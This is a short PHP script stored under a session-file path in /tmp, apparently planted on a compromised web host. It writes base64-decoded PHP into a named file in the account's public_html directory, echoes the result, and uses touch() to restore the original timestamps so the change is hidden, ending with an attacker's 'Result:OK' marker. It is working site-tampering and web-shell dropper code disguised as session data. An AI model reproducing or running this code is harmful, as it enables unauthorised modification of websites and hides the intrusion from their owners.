File: //tmp/sess_dab0da892c15ecbc5a4862331a5955cd
<?php echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'></head><body>";$filepath = "/home/pati454t/public_html/jzzbbvrt.php"; $dirpath = @dirname($filepath); $tm = @filemtime($filepath);$mf = @fopen($filepath, "w"); if ($mf) { $txt = base64_decode("PD9waHAgZWNobyAiZXZhbCgpOyI7"); fwrite($mf, $txt); fclose($mf); print("<div>Edited!</div>\n<br>"); } if(file_exists($filepath)) { $txt = file_get_contents($filepath); print("<textarea>$txt</textarea>"); if($tm) { @touch($filepath,$tm,$tm); @touch($dirpath,$tm,$tm); } };echo "Result:OK"; echo "</body></html>"; die;